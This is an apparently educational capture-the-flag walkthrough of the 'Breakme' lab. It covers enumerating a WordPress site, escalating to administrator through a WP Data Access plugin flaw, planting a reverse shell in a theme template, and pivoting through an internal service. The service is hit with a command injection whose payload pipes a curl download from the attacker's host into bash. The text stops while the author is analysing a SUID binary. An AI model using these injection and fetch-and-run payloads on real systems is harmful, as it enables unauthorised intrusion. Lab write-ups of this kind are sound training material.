┌──(kali㉿kali)-[~]
└─$ nmap breakme.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:14 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,80 breakme.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:21 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 8e:4f:77:7f:f6:aa:6a:dc:17:c9:bf:5a:2b:eb:8c:41 (RSA)
| 256 a3:9c:66:73:fc:b9:23:c0:0f:da:1d:c9:84:d6:b1:4a (ECDSA)
|_ 256 6d:c2:0e:89:25:55:10:a9:9e:41:6e:0d:81:9a:17:cb (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
We use Ferroxbuster for a directory scan. It’s evident that the web server in question is operating WordPress.
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://breakme.thm/ -w /usr/share/wordlists/dirb/big.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://breakme.thm/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirb/big.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 24l 126w 10355c http://breakme.thm/icons/openlogo-75.png
200 GET 368l 933w 10701c http://breakme.thm/
301 GET 9l 28w 311c http://breakme.thm/manual => http://breakme.thm/manual/
301 GET 9l 28w 314c http://breakme.thm/manual/da => http://breakme.thm/manual/da/
301 GET 9l 28w 314c http://breakme.thm/manual/en => http://breakme.thm/manual/en/
301 GET 9l 28w 314c http://breakme.thm/manual/de => http://breakme.thm/manual/de/
301 GET 9l 28w 314c http://breakme.thm/manual/es => http://breakme.thm/manual/es/
301 GET 9l 28w 318c http://breakme.thm/manual/images => http://breakme.thm/manual/images/
200 GET 3l 26w 3083c http://breakme.thm/manual/images/mod_rewrite_fig1.png
200 GET 1l 5w 87c http://breakme.thm/manual/images/right.gif
200 GET 10l 34w 2420c http://breakme.thm/manual/images/mod_rewrite_fig2.png
200 GET 18l 118w 6536c http://breakme.thm/manual/images/feather.gif
200 GET 1l 5w 84c http://breakme.thm/manual/images/down.gif
200 GET 14l 54w 2412c http://breakme.thm/manual/images/index.gif
200 GET 25l 87w 6358c http://breakme.thm/manual/images/mod_rewrite_fig1.gif
200 GET 16l 74w 5983c http://breakme.thm/manual/images/ssl_intro_fig1.png
200 GET 8l 24w 1868c http://breakme.thm/manual/images/mod_filter_new.png
200 GET 26l 111w 10616c http://breakme.thm/manual/images/ssl_intro_fig1.gif
200 GET 50l 355w 31098c http://breakme.thm/manual/images/custom_errordocs.png
200 GET 105l 493w 29291c http://breakme.thm/manual/images/caching_fig1.gif
301 GET 9l 28w 314c http://breakme.thm/manual/fr => http://breakme.thm/manual/fr/
200 GET 158l 1179w 92140c http://breakme.thm/manual/images/build_a_mod_3.png
200 GET 931l 5534w 463351c http://breakme.thm/manual/images/bal-man.png
301 GET 9l 28w 314c http://breakme.thm/manual/ja => http://breakme.thm/manual/ja/
301 GET 9l 28w 314c http://breakme.thm/manual/ko => http://breakme.thm/manual/ko/
301 GET 9l 28w 324c http://breakme.thm/manual/da/developer => http://breakme.thm/manual/da/developer/
301 GET 9l 28w 318c http://breakme.thm/manual/da/faq => http://breakme.thm/manual/da/faq/
301 GET 9l 28w 324c http://breakme.thm/manual/en/developer => http://breakme.thm/manual/en/developer/
301 GET 9l 28w 324c http://breakme.thm/manual/de/developer => http://breakme.thm/manual/de/developer/
301 GET 9l 28w 324c http://breakme.thm/manual/es/developer => http://breakme.thm/manual/es/developer/
301 GET 9l 28w 317c http://breakme.thm/manual/pt-br => http://breakme.thm/manual/pt-br/
301 GET 9l 28w 320c http://breakme.thm/manual/da/howto => http://breakme.thm/manual/da/howto/
301 GET 9l 28w 324c http://breakme.thm/manual/ja/developer => http://breakme.thm/manual/ja/developer/
301 GET 9l 28w 314c http://breakme.thm/manual/ru => http://breakme.thm/manual/ru/
301 GET 9l 28w 318c http://breakme.thm/manual/es/faq => http://breakme.thm/manual/es/faq/
301 GET 9l 28w 318c http://breakme.thm/manual/de/faq => http://breakme.thm/manual/de/faq/
301 GET 9l 28w 317c http://breakme.thm/manual/style => http://breakme.thm/manual/style/
200 GET 42l 190w 1425c http://breakme.thm/manual/style/sitemap.dtd
200 GET 24l 127w 907c http://breakme.thm/manual/style/lang.dtd
301 GET 9l 28w 320c http://breakme.thm/manual/en/howto => http://breakme.thm/manual/en/howto/
200 GET 1622l 6889w 73959c http://breakme.thm/manual/style/scripts/prettify.js
200 GET 5l 21w 167c http://breakme.thm/manual/style/scripts/MINIFY
301 GET 9l 28w 320c http://breakme.thm/manual/es/howto => http://breakme.thm/manual/es/howto/
301 GET 9l 28w 320c http://breakme.thm/manual/de/howto => http://breakme.thm/manual/de/howto/
301 GET 9l 28w 314c http://breakme.thm/manual/tr => http://breakme.thm/manual/tr/
301 GET 9l 28w 314c http://breakme.thm/wordpress => http://breakme.thm/wordpress/
301 GET 9l 28w 324c http://breakme.thm/manual/ko/developer => http://breakme.thm/manual/ko/developer/
301 GET 9l 28w 319c http://breakme.thm/manual/da/misc => http://breakme.thm/manual/da/misc/
301 GET 9l 28w 320c http://breakme.thm/manual/ja/howto => http://breakme.thm/manual/ja/howto/
301 GET 9l 28w 318c http://breakme.thm/manual/da/mod => http://breakme.thm/manual/da/mod/
301 GET 9l 28w 318c http://breakme.thm/manual/ko/faq => http://breakme.thm/manual/ko/faq/
301 GET 9l 28w 320c http://breakme.thm/manual/fr/howto => http://breakme.thm/manual/fr/howto/
301 GET 9l 28w 317c http://breakme.thm/manual/zh-cn => http://breakme.thm/manual/zh-cn/
301 GET 9l 28w 319c http://breakme.thm/manual/en/misc => http://breakme.thm/manual/en/misc/
301 GET 9l 28w 319c http://breakme.thm/manual/es/misc => http://breakme.thm/manual/es/misc/
301 GET 9l 28w 318c http://breakme.thm/manual/en/mod => http://breakme.thm/manual/en/mod/
301 GET 9l 28w 323c http://breakme.thm/manual/da/platform => http://breakme.thm/manual/da/platform/
301 GET 9l 28w 323c http://breakme.thm/manual/da/programs => http://breakme.thm/manual/da/programs/
301 GET 9l 28w 319c http://breakme.thm/manual/de/misc => http://breakme.thm/manual/de/misc/
301 GET 9l 28w 318c http://breakme.thm/manual/es/mod => http://breakme.thm/manual/es/mod/
301 GET 9l 28w 321c http://breakme.thm/manual/es/vhosts => http://breakme.thm/manual/es/vhosts/
301 GET 9l 28w 324c http://breakme.thm/manual/tr/developer => http://breakme.thm/manual/tr/developer/
301 GET 9l 28w 325c http://breakme.thm/wordpress/wp-content => http://breakme.thm/wordpress/wp-content/
301 GET 9l 28w 323c http://breakme.thm/wordpress/wp-admin => http://breakme.thm/wordpress/wp-admin/
301 GET 9l 28w 326c http://breakme.thm/wordpress/wp-includes => http://breakme.thm/wordpress/wp-includes/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/assets => http://breakme.thm/wordpress/wp-includes/assets/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/blocks => http://breakme.thm/wordpress/wp-includes/blocks/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/certificates => http://breakme.thm/wordpress/wp-includes/certificates/
301 GET 9l 28w 327c http://breakme.thm/wordpress/wp-admin/css => http://breakme.thm/wordpress/wp-admin/css/
301 GET 9l 28w 330c http://breakme.thm/wordpress/wp-includes/css => http://breakme.thm/wordpress/wp-includes/css/
301 GET 9l 28w 336c http://breakme.thm/wordpress/wp-includes/customize => http://breakme.thm/wordpress/wp-includes/customize/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/audio => http://breakme.thm/wordpress/wp-includes/blocks/audio/
301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/archives => http://breakme.thm/wordpress/wp-includes/blocks/archives/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/avatar => http://breakme.thm/wordpress/wp-includes/blocks/avatar/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/button => http://breakme.thm/wordpress/wp-includes/blocks/button/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/buttons => http://breakme.thm/wordpress/wp-includes/blocks/buttons/
301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/calendar => http://breakme.thm/wordpress/wp-includes/blocks/calendar/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/block => http://breakme.thm/wordpress/wp-includes/blocks/block/
301 GET 9l 28w 344c http://breakme.thm/wordpress/wp-includes/blocks/categories => http://breakme.thm/wordpress/wp-includes/blocks/categories/
301 GET 9l 28w 330c http://breakme.thm/wordpress/wp-admin/images => http://breakme.thm/wordpress/wp-admin/images/
301 GET 9l 28w 326c http://breakme.thm/wordpress/wp-admin/js => http://breakme.thm/wordpress/wp-admin/js/
301 GET 9l 28w 332c http://breakme.thm/wordpress/wp-admin/includes => http://breakme.thm/wordpress/wp-admin/includes/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/code => http://breakme.thm/wordpress/wp-includes/blocks/code/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/images => http://breakme.thm/wordpress/wp-includes/images/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/column => http://breakme.thm/wordpress/wp-includes/blocks/column/
301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/comments => http://breakme.thm/wordpress/wp-includes/blocks/comments/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/columns => http://breakme.thm/wordpress/wp-includes/blocks/columns/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/cover => http://breakme.thm/wordpress/wp-includes/blocks/cover/
301 GET 9l 28w 329c http://breakme.thm/wordpress/wp-includes/js => http://breakme.thm/wordpress/wp-includes/js/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/details => http://breakme.thm/wordpress/wp-includes/blocks/details/
301 GET 9l 28w 329c http://breakme.thm/wordpress/wp-admin/maint => http://breakme.thm/wordpress/wp-admin/maint/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/embed => http://breakme.thm/wordpress/wp-includes/blocks/embed/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-admin/css/colors => http://breakme.thm/wordpress/wp-admin/css/colors/
301 GET 9l 28w 331c http://breakme.thm/wordpress/wp-admin/network => http://breakme.thm/wordpress/wp-admin/network/
301 GET 9l 28w 335c http://breakme.thm/wordpress/wp-includes/css/dist => http://breakme.thm/wordpress/wp-includes/css/dist/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/file => http://breakme.thm/wordpress/wp-includes/blocks/file/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/gallery => http://breakme.thm/wordpress/wp-includes/blocks/gallery/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/group => http://breakme.thm/wordpress/wp-includes/blocks/group/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/heading => http://breakme.thm/wordpress/wp-includes/blocks/heading/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/html => http://breakme.thm/wordpress/wp-includes/blocks/html/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/image => http://breakme.thm/wordpress/wp-includes/blocks/image/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-content/plugins => http://breakme.thm/wordpress/wp-content/plugins/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/list => http://breakme.thm/wordpress/wp-includes/blocks/list/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/images/crystal => http://breakme.thm/wordpress/wp-includes/images/crystal/
301 GET 9l 28w 335c http://breakme.thm/wordpress/wp-includes/sitemaps => http://breakme.thm/wordpress/wp-includes/sitemaps/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-includes/js/dist => http://breakme.thm/wordpress/wp-includes/js/dist/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-includes/js/crop => http://breakme.thm/wordpress/wp-includes/js/crop/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/missing => http://breakme.thm/wordpress/wp-includes/blocks/missing/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/more => http://breakme.thm/wordpress/wp-includes/blocks/more/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-content/plugins/akismet => http://breakme.thm/wordpress/wp-content/plugins/akismet/
301 GET 9l 28w 328c http://breakme.thm/wordpress/wp-admin/user => http://breakme.thm/wordpress/wp-admin/user/
301 GET 9l 28w 344c http://breakme.thm/wordpress/wp-includes/blocks/navigation => http://breakme.thm/wordpress/wp-includes/blocks/navigation/
301 GET 9l 28w 332c http://breakme.thm/wordpress/wp-content/themes => http://breakme.thm/wordpress/wp-content/themes/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/query => http://breakme.thm/wordpress/wp-includes/blocks/query/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/spacer => http://breakme.thm/wordpress/wp-includes/blocks/spacer/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/images/smilies => http://breakme.thm/wordpress/wp-includes/images/smilies/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/js/swfupload => http://breakme.thm/wordpress/wp-includes/js/swfupload/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/js/thickbox => http://breakme.thm/wordpress/wp-includes/js/thickbox/
301 GET 9l 28w 337c http://breakme.thm/wordpress/wp-includes/js/tinymce => http://breakme.thm/wordpress/wp-includes/js/tinymce/
301 GET 9l 28w 345c http://breakme.thm/wordpress/wp-includes/sitemaps/providers => http://breakme.thm/wordpress/wp-includes/sitemaps/providers/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-admin/js/widgets => http://breakme.thm/wordpress/wp-admin/js/widgets/
Visiting the index page, we are just greeted with an Apache2 Debian default page.
We visit the WordPress site and discover that it is a straightforward blog.
http://breakme.thm/wordpress/
We seem to be in the right place http://breakme.thm/wordpress/index.php/breakme/.
Next, we use WPScan to analyze the WordPress application. It reveals that the site is running version 6.4.3, which contains a vulnerability allowing user enumeration.
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct 7 12:17:29 2024
.
.
.
.
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
| Found By: Rss Generator (Passive Detection)
| - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
| - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
[+] WordPress theme in use: twentytwentyfour
| Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
Initial Access
We continue focusing on the WordPress site and run additional WPScan assessments to extract more useful information. These scans help identify potential vulnerabilities that could be exploited.
WPScan Part I - Enum Credentials
We begin by attempting to enumerate existing users on the WordPress site. Through this process, we successfully identify two users: bob and admin.
A link in the sample page http://breakme.thm/wordpress/index.php/sample-page takes us to the login window.
We log in using the discovered credentials but realize that the account doesn't have elevated privileges. The admin dashboard is not visible, indicating this user has limited permissions.
We can make changes to our profile and are able to make minor adjustments at the dashboard.
WPSan Part II - Further Enumeration (WPScan API Key)
It looks like we haven't discovered everything yet. Next we run another WPScan, this time with an API key.
This can be obtained free of charge after registering on the next page of WPScan. This will allow us to get our results associated with CVEs.
We run the WPScan using the API key and discover an interesting finding that belongs to CVE-2023-1874, which is WP Data Access <= 5.3.7 - Authenticated (Subscriber+) Privilege Escalation.
┌──(kali㉿kali)-[~]
└─$ export WPSCAN_API_TOKEN=[REDACTED]
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct 7 12:53:11 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.56 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://breakme.thm/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://breakme.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://breakme.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
| Found By: Rss Generator (Passive Detection)
| - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
| - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
| Fixed in: 6.4.4
| References:
| - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
| - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.4.5
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.4.5
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.4.5
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[+] WordPress theme in use: twentytwentyfour
| Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-data-access
| Location: http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/
| Last Updated: 2024-09-18T00:01:00.000Z
| [!] The version is out of date, the latest version is 5.5.14
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
| Fixed in: 5.3.8
| References:
| - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874
| - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
|
| [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
| Fixed in: 5.3.11
| References:
| - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
|
| [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
| Fixed in: 5.5.9
| References:
| - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd
|
| Version: 5.3.5 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:05 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 22
[+] Finished: Mon Oct 7 12:53:26 2024
[+] Requests Done: 176
[+] Cached Requests: 5
[+] Data Sent: 47.983 KB
[+] Data Received: 311.351 KB
[+] Memory used: 273.23 MB
[+] Elapsed time: 00:00:14
We can find out more about the vulnerability in the following post:
So we update our profile first.
We submit the request and intercept it via Burp Suite. We must now add the following parameter, which is not already set.
&wpda_role[]=administrator
We assign ourselves the administrator role. However, if we make an error with the parameter and input it incorrectly, we risk being locked out and losing access to the dashboard, requiring a machine restart to regain access.
Reverse Shell
To establish a foothold, we leverage our elevated privileges to create a reverse shell. Following guidance from Hacktricks, we modify a template page's content with a reverse shell script, utilizing revshells.com to generate a suitable Pentest Monkey reverse shell. We ensure this process runs in the background while setting up a listener to catch the incoming connection.
Next, we reach out to the following Page to update a template for a reverse shell.
Here we first set the template to Twenty-Twenty One, because this has a PHP template for the 404 page. We select this and then replace everything with the reverse shell content and then update the file.
Now we only need to call up our edited page with the following URL:
We then get a reverse shell on our listener and upgrade our shell. We are www-data, but don't have access to the first flag for the time being.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.221.241] 43952
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
03:49:00 up 2:18, 0 users, load average: 0.00, 0.00, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (616): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$
First. Let's upgrade this shell.
We transfer linpeas to the machine and run it.
After our Linpeas scan we find access possibilities to files of other users john and youcef.
We find the first flag in john's home directory, but have no access to it. We may have to get access to user john.
Reverse Shell as john
When enurering using www-data, we detect an internal service running on port 9999.
www-data@Breakme:/home/john$ netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
This seems to be another site, possibly an entry point to user john.
Before we continue, let's take a look at possible processes running in the background using Pspy. Here we see that the service is a web server running in the context of the user with the uid 1002.
This is our user john.
We now want to investigate the service on port 9999 further. To do this, we create a tunnel using Ligolo-ng to gain access to it.
Setup Ligolo-ng
First, we set up a TUN (network tunnel) interface named "ligolo" and configuring routes to forward traffic for 240.0.0.1 through the tunnel.
┌──(kali㉿kali)-[~]
└─$ sudo ip tuntap add user 0xb0b mode tun ligolo
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo ip link set ligolo up
┌──(kali㉿kali)-[~]
└─$ sudo ip route add 240.0.0.1 dev ligolo
Next, we download the latest release of ligolo-ng. The proxy and the agent are in the amd64 version.
On our attack machine, we start the proxy server.
./proxy -selfcert
Next on the target machine we start the agent to connect to our proxy.
./agent -connect 10.8.211.1:11601 --ignore-cert
We receive a message on our ligolo-ng proxy that an agent has joined. We select the session using session and then start it.
We are now able to reach internal port 9999 via the address 240.0.0.1.
Here we have a page with tools that include a check target, a check user and check file. This suggests that some kind of command injection could be possible.
If we enter our IP at Check Target, we find that a ping is actually executed. The input only allows the numerical representation of IP addresses.
Check user reflects the entries you have made. However, we cannot find a valid user, not even under the known john, bob or www-data.
The file check does not seem to find any files either. Special characters or numbers do not seem to be permitted here.
We enter a set of special characters in Check User and see that a small set is reflected. Not everything is removed. We also notice that the space character is removed.
Copy
!@#$%^&*()_+-={}[]|:;'"<>,.?/
With the character set of special characters that we determined earlier, we can try the following command injection. We use the ${IFS} variable to replace the space, pipe that ping command to the previous command as output.
|ping${IFS}10.17.15.155
We then capture the pings via tcpdump and see that our command injection was successful.
Next, we prepare a simple reverse shell payload. Since we can't use & we use curl to distribute our reverse shell and execute it in the same command.
Then we set up a Python web server to provide the payload.
We replace our ping with a curl command, to see if we can successfully request the payload.
Copy
|curl${IFS}http://10.17.15.155/payload.sh
Now we set up a listener on port 4446 and adapt our command with a pipe to bash.
|curl${IFS}http://10.17.15.155/payload.sh|bash
This gives us our first flag.
Reverse Shell as Youcef
In the home directory of youcef we find that we have access to other files, including readfile.
We want to take a closer look at the files and set up a python web server in the home directory to access these.
Initially, we decompile the readfile binary since we lack access to readfile.c. This binary has the SUID bit set, allowing us to read files with the privileges of its owner, Youcef. We hope to retrieve Youcef's SSH key. However, attempts to read the file result in a "file not found" error, and our access to readfile.c returns a Nice Try! message, indicating restrictions in place.
After decompiling the binary, we discover that it includes checks to verify if the user is john by searching for the UID. It also prevents access to specific filenames like flag and id_rsa, resulting in a Nice Try! message if those are attempted. Additionally, the program checks for symlinks, which if opened, also fail, along with any files to which user john does not have access.
